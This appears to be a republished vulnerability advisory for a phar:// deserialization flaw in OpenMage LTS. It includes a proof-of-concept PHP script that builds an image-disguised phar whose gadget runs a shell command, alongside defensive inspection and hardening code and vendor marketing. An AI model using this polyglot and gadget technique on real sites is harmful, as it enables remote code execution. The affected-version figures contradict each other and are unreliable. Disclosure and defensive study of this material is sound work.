Summary
PHP functions such as getimagesize(), file_exists(), and is_readable() can trigger deserialization when processing phar:// stream wrapper paths. OpenMage LTS uses these functions with potentially controllable file paths during image validation and media handling. An attacker who can upload a malicious phar file (disguised as an image) and trigger one of these functions with a phar:// path can achieve arbitrary code execution.
| Metric | Value | Justification |
|---|---|---|
| Attack Vector (AV) | Network | Exploitable via file upload and web requests |
| Attack Complexity (AC) | High | Requires file upload + triggering phar:// access |
| Privileges Required (PR) | None | Some upload vectors don't require authentication |
| User Interaction (UI) | None | Exploitation is automatic once triggered |
| Scope (S) | Unchanged | Impacts the vulnerable component |
| Confidentiality (C) | High | Full system access via RCE |
| Integrity (I) | High | Arbitrary code execution |
| Availability (A) | High | Complete system compromise possible |
Affected Products
- OpenMage LTS versions < 20.16.1
- All versions derived from Magento 1.x with these code paths
Affected Files
| File | Line | Vulnerable Function |
|---|---|---|
| app/code/core/Mage/Core/Model/File/Validator/Image.php | 72 | getimagesize($filePath) |
| app/code/core/Mage/Cms/Model/Wysiwyg/Images/Storage.php | 137 | getimagesize($item->getFilename()) |
| lib/Varien/Image.php | 71 | $this->_getAdapter()->open($this->_fileName) |
Vulnerability Details
PHP's phar (PHP Archive) format stores archive metadata in its manifest in serialize() form. On PHP 7.x, any stream function that opens a file through the phar:// wrapper unserializes that metadata automatically, so seemingly harmless calls such as file_exists(), is_readable() or getimagesize() instantiate whatever objects the metadata describes. The wrapper recognises a phar by its __HALT_COMPILER(); stub, not by the file extension, so a .jpg serves as well as a .phar. (PHP 8.0 stopped unserializing phar metadata on open; Phar::getMetadata() still deserializes on demand, so phar metadata should be treated as untrusted on every version.)
A polyglot file can be crafted that is both a valid image (passing initial validation) and a valid phar archive containing malicious serialized objects: the stub may begin with arbitrary bytes, so a complete small JPEG can precede `<?php __HALT_COMPILER(); ?>`, and image parsers ignore the manifest that follows the image data. When the application later processes this file through phar://, the deserialization triggers a gadget chain (a class already loadable in the application whose __wakeup() or __destruct() does something dangerous) leading to RCE.
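As an added example (not part of this advisory or of OpenMage's code), the script below builds a small phar the same way the proof of concept does, then locates the manifest and pulls the serialized metadata out by hand, without ever letting PHP's phar machinery touch it. This is the triage step a responder wants for a suspicious upload: it shows what the file would deserialize, on any PHP version, without deserializing it. The field layout follows the phar file format in the PHP manual; the Marker class and file names are assumptions. Writing a phar requires `php -d phar.readonly=0`.

```php
<?php
// Added example, not OpenMage's code. Run with: php -d phar.readonly=0 inspect.php
// Marker is a benign stand-in for a gadget class; file names are assumptions.

class Marker
{
    public $note = 'stored in phar metadata';
}

function buildPhar(string $path): void
{
    @unlink($path);
    $phar = new Phar($path);               // the Phar API only creates *.phar names
    $phar->startBuffering();
    $phar->addFromString('test.txt', 'test');
    $phar->setStub('<?php __HALT_COMPILER(); ?>');
    $phar->setMetadata(new Marker());      // serialize()d into the manifest on flush
    $phar->stopBuffering();
}

// Walk a plain (uncompressed, non-zip/tar) phar manifest and return the raw
// serialized metadata bytes, or null if the file carries none.
function extractPharMetadata(string $bytes): ?string
{
    $pos = stripos($bytes, '__HALT_COMPILER();');   // PHP matches the token case-insensitively
    if ($pos === false) {
        return null;                                  // not a phar at all
    }
    $pos += strlen('__HALT_COMPILER();');
    if (substr($bytes, $pos, 3) === ' ?>') {          // optional closing tag ...
        $pos += 3;
    }
    if (substr($bytes, $pos, 2) === "\r\n") {         // ... and optional newline
        $pos += 2;
    } elseif (substr($bytes, $pos, 1) === "\n") {
        $pos += 1;
    }
    // manifest length(4) | file count(4) | api version(2) | flags(4) | alias length(4)
    $head = unpack('Vmanifest/Vfiles/vapi/Vflags/Valias', substr($bytes, $pos, 18));
    $pos += 18 + $head['alias'];                      // skip the alias string
    $metaLen = unpack('V', substr($bytes, $pos, 4))[1];
    $pos += 4;
    return $metaLen > 0 ? substr($bytes, $pos, $metaLen) : null;
}

$file = __DIR__ . '/exploit.phar';
buildPhar($file);
rename($file, __DIR__ . '/exploit.jpg');              // extension is irrelevant to phar://

$meta = extractPharMetadata(file_get_contents(__DIR__ . '/exploit.jpg'));
echo "raw metadata: ", $meta, "\n";

// Safe inspection: never unserialize attacker-controlled bytes with classes enabled.
$obj = unserialize($meta, ['allowed_classes' => false]);
echo get_class($obj), "\n";
```

The first line printed is the serialize() string for Marker (it begins `O:6:"Marker":`), and the second is `__PHP_Incomplete_Class`, because allowed_classes => false prevents instantiation of the named class. On PHP 7.x, a single `file_exists('phar://' . $path . '/test.txt')` on the renamed file would instead unserialize that metadata with classes enabled; on PHP 8.0 and later the wrapper no longer does so on open, which is why reading the manifest directly is the version-independent way to inspect it.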
Attack Flow
- Create polyglot file: the attacker creates a file that is both a valid JPEG and a valid phar archive
- Upload file: the attacker uploads the polyglot via product images, CMS media, or import
- Trigger phar:// access: the attacker causes the application to access the file through the phar:// wrapper
- Code execution: phar metadata deserialization triggers the gadget chain
Proof of Concept
```php
<?php
// Create malicious phar file.
// Writing a phar needs phar.readonly=0: run with `php -d phar.readonly=0 poc.php`.
// ExploitGadget stands in for a real gadget: phar metadata only names the class,
// it does not ship its code, so a class with this name and behaviour must already
// be loadable on the target (an application or library gadget chain).
// Note that the destructor also fires in this generator process when the object is freed.
class ExploitGadget {
    public $cmd = 'id > /tmp/pwned';
    function __destruct() {
        system($this->cmd);
    }
}
$phar = new Phar('exploit.phar');   // the Phar API only creates files named *.phar
$phar->startBuffering();
$phar->addFromString('test.txt', 'test');
// For a true image/phar polyglot this stub would be prefixed with a complete
// small JPEG; PHP only requires that the stub contains __HALT_COMPILER();
$phar->setStub('<?php __HALT_COMPILER(); ?>');
$phar->setMetadata(new ExploitGadget());   // serialized into the manifest
$phar->stopBuffering();
// Rename to appear as image; the phar:// wrapper ignores the extension
rename('exploit.phar', 'exploit.jpg');
// When getimagesize('phar://path/to/exploit.jpg') is called on PHP 7.x,
// the metadata is unserialized and ExploitGadget::__destruct() executes
```
Workarounds
If immediate upgrade is not possible:
- Disable the phar:// stream wrapper (if not needed): there is no php.ini directive for this (disable_functions only accepts function names, so `disable_functions = phar://` has no effect). Unregister the wrapper in code at application bootstrap with stream_wrapper_unregister('phar'), before any user-controlled path reaches a filesystem function, or run a PHP build without the phar extension.
- Strict upload validation: implement additional validation beyond the file extension, such as re-encoding images and rejecting files that contain a phar stub.
- File storage isolation: store uploads outside the web root with randomized names.
- Web Application Firewall: block requests containing phar:// in parameters. Treat this as a partial measure only: PHP resolves wrapper names case-insensitively (PHAR://), and phar:// can be nested inside other wrappers such as php://filter/resource=phar://.
Credit
This vulnerability was discovered and responsibly disclosed by blackhat2013 through HackerOne.
Timeline
- 2025-12-31: Vulnerability reported via HackerOne
- 2026-01-21: Fix developed and tested
Impact
Untrusted serialized data is processed by a deserializer that can instantiate arbitrary objects or execute code as a side effect. Typical impact: arbitrary code execution or logic abuse.
CVE-2026-25524 has a CVSS score of 8.1 (High). The vector is network-reachable, no privileges required, and no user interaction. A CVSS score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether this affects your application depends on whether the vulnerable code is present and reachable in your environment. A fixed version is available (20.17.0); upgrading removes the vulnerable code path.
Kodem intelligence
Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.
Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.
Remediation advice
Block phar:// paths before they reach the vulnerable functions. The upstream fix is a prefix check (str_starts_with() is PHP 8.0+; older PHP needs a polyfill or strncmp()). On its own this check is weaker than unregistering the wrapper, which the release also does: PHP resolves wrapper names case-insensitively, and phar:// can be nested inside other wrappers (php://filter/resource=phar://...).
```php
// Before (vulnerable)
[$imageWidth, $imageHeight, $fileType] = getimagesize($filePath);

// After (fixed)
if (str_starts_with($filePath, 'phar://')) {
    throw new Exception('Invalid image path.');
}
[$imageWidth, $imageHeight, $fileType] = getimagesize($filePath);
```
Additionally, ICO files (which cannot be re-encoded by GD) are now scanned for phar signatures:
- __HALT_COMPILER(); - required phar stub
- <?php - PHP opening tag
- <?= - PHP short echo tag
Additional hardening measures:
- ICO uploads removed: ICO file support is completely removed from new image uploads. This eliminates the polyglot attack vector entirely, since all other image formats are re-encoded by GD, which strips any embedded phar metadata.
- Phar wrapper disabled: the phar:// stream wrapper is unregistered at application bootstrap, preventing any phar deserialization attacks regardless of code path.
- Cache deserialization hardening: all unserialize() calls on cached data now use allowed_classes => false as defense-in-depth.
Note: Existing uploaded ICO files will continue to work. Only new ICO uploads will be rejected. Users are encouraged to use PNG favicons for new uploads.
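The following is an added example, not OpenMage's code, that puts the three layers from the workarounds and remediation sections above into one runnable file: unregistering the wrapper at bootstrap, a path check that is stricter than the prefix test (it refuses any scheme, so PHAR:// and nested php://filter/ or compress.zlib:// forms are caught too), and the byte-level stub scan the fix applies to ICO uploads. Function names, sample paths and the sample byte strings are constructed for illustration. Run with `php phar_hardening.php`.

```php
<?php
// Added example, not OpenMage's code. Function names, sample paths and
// sample bytes are illustrative assumptions.

// 1. Bootstrap: remove the phar:// wrapper before any user-controlled path can
//    reach a filesystem function. This must live in trusted code that runs
//    first; stream_wrapper_restore('phar') would undo it.
function disablePharWrapper(): bool
{
    if (!in_array('phar', stream_get_wrappers(), true)) {
        return true;                                  // already absent
    }
    return stream_wrapper_unregister('phar');
}

// 2. Path check. A bare str_starts_with($path, 'phar://') misses "PHAR://"
//    (PHP resolves wrapper names case-insensitively) and wrapper chains such as
//    php://filter/resource=phar://... or compress.zlib://phar://...
//    Local image paths never legitimately contain a scheme, so refuse any.
function isSafeImagePath(string $path): bool
{
    if (strpos($path, "\0") !== false) {
        return false;                                 // NUL-byte truncation
    }
    return preg_match('~[a-z][a-z0-9+.\-]*://~i', $path) === 0;
}

// 3. Content scan for uploads that GD cannot re-encode (the fix does this for
//    ICO). PHP only treats a file as a phar if its stub contains
//    __HALT_COMPILER(); and matches that token case-insensitively, hence stripos().
const PHAR_STUB_SIGNATURES = ['__HALT_COMPILER();', '<?php', '<?='];

function findPharSignature(string $bytes): ?string
{
    foreach (PHAR_STUB_SIGNATURES as $sig) {
        if (stripos($bytes, $sig) !== false) {
            return $sig;
        }
    }
    return null;                                      // clean
}

// Self-check on constructed samples (not real uploads).
function selfCheck(): array
{
    $failures = [];
    $paths = [                                        // path => expected verdict
        '/var/www/media/catalog/product/a.jpg'        => true,
        'phar:///var/www/media/x.jpg/test.txt'        => false,
        'PHAR:///var/www/media/x.jpg/test.txt'        => false,
        'php://filter/resource=phar:///var/www/x.jpg' => false,
        'compress.zlib://phar:///var/www/x.jpg'       => false,
        "/var/www/media/x.jpg\0.png"                  => false,
    ];
    foreach ($paths as $path => $expected) {
        if (isSafeImagePath($path) !== $expected) {
            $failures[] = 'path: ' . addcslashes($path, "\0");
        }
    }
    // constructed ICO header (reserved 0, type 1, one image) plus filler
    $cleanIco = "\x00\x00\x01\x00\x01\x00" . str_repeat("\x00", 16);
    // constructed polyglot shape: JPEG SOI marker followed by a phar stub
    $polyglot = "\xFF\xD8\xFF\xE0" . '<?php __halt_compiler(); ?>' . "\r\n";
    if (findPharSignature($cleanIco) !== null) {
        $failures[] = 'clean ICO flagged';
    }
    if (findPharSignature($polyglot) !== '__HALT_COMPILER();') {
        $failures[] = 'polyglot not flagged';
    }
    return $failures;
}

disablePharWrapper();
$failures = selfCheck();
echo $failures ? implode("\n", $failures) . "\n" : "all checks passed\n";
// With the wrapper gone, a phar:// path is refused even where a check is missed.
var_dump(@file_exists('phar:///var/www/media/x.jpg/test.txt'));
```

The final file_exists() returns false: with no phar wrapper registered PHP emits an "Unable to find the wrapper" warning (suppressed here) and falls back to treating the whole string as a plain path. The scan deliberately flags `<?php` and `<?=` as well as the stub token, matching the signatures the fix checks; for formats GD re-encodes, re-encoding already discards any trailing manifest, which is why the fix limits the scan to ICO.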
Frequently Asked Questions
- What is CVE-2026-25524? CVE-2026-25524 is a high-severity insecure deserialization vulnerability in openmage/magento-lts (composer), affecting versions < 20.17.0. It is fixed in 20.17.0. Untrusted serialized data is processed by a deserializer that can instantiate arbitrary objects or execute code as a side effect.
- How severe is CVE-2026-25524? CVE-2026-25524 has a CVSS score of 8.1 (High). This score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether it represents real risk in your environment depends on whether the vulnerable code is present and reachable.
- Which versions of openmage/magento-lts are affected by CVE-2026-25524? openmage/magento-lts (composer) versions < 20.17.0 are affected.
- Is there a fix for CVE-2026-25524? Yes. CVE-2026-25524 is fixed in 20.17.0. Upgrade to this version or later.
- Is CVE-2026-25524 exploitable, and should I be worried? Whether CVE-2026-25524 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk.
- What actually determines whether CVE-2026-25524 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
- How do I fix CVE-2026-25524? Upgrade openmage/magento-lts to 20.17.0 or later.